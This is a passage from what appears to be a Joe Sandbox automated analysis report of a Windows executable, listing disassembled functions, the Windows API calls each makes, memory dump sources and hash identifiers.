                                                                                                                                                        • Instruction ID: 95922045410f1b27c8331793e2273264d7ad9a209b1087b49ad949333ef060e1
                                                                                                                                                        • Opcode Fuzzy Hash: 2caf932458259c32409883c1e96618fc6ae929953422d56e7d60d6b17a8cc78b
                                                                                                                                                        • Instruction Fuzzy Hash: 7D412472A00219BACF15FBA0DE57EEEB7F9AF14741F500066F206B20A2DE655F04CB61
                                                                                                                                                        Function 00ADD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00ADD96C
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD98E
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ADD9CB
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ADD9F0
                                                                                                                                                        • _memset.LIBCMT ref: 00ADDA0F
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00ADDA4B
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00ADDA80
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ADDA8B
                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00ADDA94
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ADDA9E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                                        • Opcode ID: b56ade2b732d41a3df3b207ceecffe92fdcdb257f75f305e0602413f769de915
                                                                                                                                                        • Instruction ID: af9259100fc36a6068257811f50b401f3abee1ab8e1ec01d572d739fb5b06f9a
                                                                                                                                                        • Opcode Fuzzy Hash: b56ade2b732d41a3df3b207ceecffe92fdcdb257f75f305e0602413f769de915
                                                                                                                                                        • Instruction Fuzzy Hash: 0F31A472600208AADB20DFA4DC49FDA77FCBF88700F50C1A6F519D6161EB709B458BA1
                                                                                                                                                        Function 00AFE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AFBD04,?,?), ref: 00AFE564
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE57B
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE586
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE593
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AFE59C
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5AB
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AFE5B4
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5BB
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AFE5CC
                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B1D9BC,?), ref: 00AFE5E5
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AFE5F5
                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00AFE619
                                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00AFE644
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AFE66C
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AFE682
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                        • Opcode ID: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                                                                                                                                                        • Instruction ID: 8800c8267b0e7864ed6f56776fb721723212e5f4b4d4ecfd74be3e2562613d74
                                                                                                                                                        • Opcode Fuzzy Hash: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                                                                                                                                                        • Instruction Fuzzy Hash: 77413A75600208BFDB11DFA5DC88EAEBBB9EF89715F508058FA06E7260DB319D41DB60
                                                                                                                                                        Function 00AE0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE0C93
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0CAB
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0CBD
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0CD2
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0CE6
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00AE0CFE
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AE0D18
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0D2A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                                                        • Opcode ID: 61429ad106a6f1000c0e022706bdd5a04dcae90515e700d7c75c0ffc686755d5
                                                                                                                                                        • Instruction ID: 38d6fe7f6ab3179d245c23a61f6a4eaf0c849b165e08ca1b862660ffd36bfb2b
                                                                                                                                                        • Opcode Fuzzy Hash: 61429ad106a6f1000c0e022706bdd5a04dcae90515e700d7c75c0ffc686755d5
                                                                                                                                                        • Instruction Fuzzy Hash: 858193715043859FC764DF65C984EAAB7E8BB88310F24892AF885C7251EB74DDC4CB92
                                                                                                                                                        Function 00ACB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                          • Part of subcall function 00ACB8E7: RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                          • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                                                                                                                                                          • Part of subcall function 00ACB982: RtlAllocateHeap.NTDLL(00000000,?,00ACB3E1), ref: 00ACB995
                                                                                                                                                          • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB5F7
                                                                                                                                                        • _memset.LIBCMT ref: 00ACB60C
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB62B
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB63C
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB679
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB695
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB6B2
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB6C1
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ACB6C8
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB6E9
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00ACB6F0
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB721
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB747
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB75B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                                        • Opcode ID: e18ff0b82a8b166ae0571e8511bd84b295573d9e4115fa38a0f7a38df085c729
                                                                                                                                                        • Instruction ID: c347d4fb0ad9dfbb0b30989e6cdef3da066a5412d7eda891ce061c47a64ec033
                                                                                                                                                        • Opcode Fuzzy Hash: e18ff0b82a8b166ae0571e8511bd84b295573d9e4115fa38a0f7a38df085c729
                                                                                                                                                        • Instruction Fuzzy Hash: D2515A75910209ABDF00DFA4DD8AEEEBB79FF48304F04816DE915A7290DB369A05CB60
                                                                                                                                                        Function 00AEA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AEA2DD
                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AEA2E9
                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00AEA2F5
                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00AEA302
                                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AEA356
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00AEA392
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AEA3B6
                                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00AEA3BE
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AEA3C7
                                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00AEA3CE
                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00AEA3D9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                        • Opcode ID: ad1ed92b9dfcc09a0af2a9bb03b9137683d7c1e9139370bd35f16313596b6b77
                                                                                                                                                        • Instruction ID: 7e12eea70d29fb97d65d5db281b7e86ad47eacc99c0d873277a97bd39596812c
                                                                                                                                                        • Opcode Fuzzy Hash: ad1ed92b9dfcc09a0af2a9bb03b9137683d7c1e9139370bd35f16313596b6b77
                                                                                                                                                        • Instruction Fuzzy Hash: 63515875900349EFCB14CFA9DC85EAEBBB9EF48310F14881DF99AA7210C731A8418B60
                                                                                                                                                        Function 00ADD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 00ADD567
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ADD589
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD5DC
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD68D
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD6AB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                                                        • Opcode ID: 730c47e96e7c36f03909fc25f54c9a4fb5f279cb9483a4697a159e29f128b509
                                                                                                                                                        • Instruction ID: dda19d6112b21521fc7f82f7aacf0bafb57a92d839e2f71a9cb652d75b911b17
                                                                                                                                                        • Opcode Fuzzy Hash: 730c47e96e7c36f03909fc25f54c9a4fb5f279cb9483a4697a159e29f128b509
                                                                                                                                                        • Instruction Fuzzy Hash: D0517172900209BACF15EBA0DE42EEEB7F9EF14700F104566F106B21A1EE715F58DBA1
                                                                                                                                                        Function 00ADD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00ADD37F
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00ADD3A0
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD3F3
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD499
                                                                                                                                                        • _wprintf.LIBCMT ref: 00ADD4B7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                                                        • Opcode ID: 43a7f7490348d3311707482024b791e3514956d64fe848ba72e042f1f2886228
                                                                                                                                                        • Instruction ID: e10945958a5c033d93df6e23fe3460500822253ccd9abf0d78e6d167115b7650
                                                                                                                                                        • Opcode Fuzzy Hash: 43a7f7490348d3311707482024b791e3514956d64fe848ba72e042f1f2886228
                                                                                                                                                        • Instruction Fuzzy Hash: 4351A372900209AACF15EBA0DE42EEEB7B9EF14700F144466F106B21A1EB756F58DB61
                                                                                                                                                        Function 00ACAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • _memset.LIBCMT ref: 00ACAF74
                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00ACAFA9
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00ACAFC5
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00ACAFE1
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00ACB00B
                                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00ACB033
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB03E
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB043
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                                        • Opcode ID: 0424787ad9abcb924b983a9b920578993e7eb123b53d20203f8fecd9f88853c1
                                                                                                                                                        • Instruction ID: 79b5bb438afeae8b7db167b757ccddfb2938232d928ef06d89bcf218343860c6
                                                                                                                                                        • Opcode Fuzzy Hash: 0424787ad9abcb924b983a9b920578993e7eb123b53d20203f8fecd9f88853c1
                                                                                                                                                        • Instruction Fuzzy Hash: 70410876D1022DAACF11EBA4DC95DEEB7B8BF18704F404069F901A3161EB719E04CFA1
                                                                                                                                                        Function 00AF3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
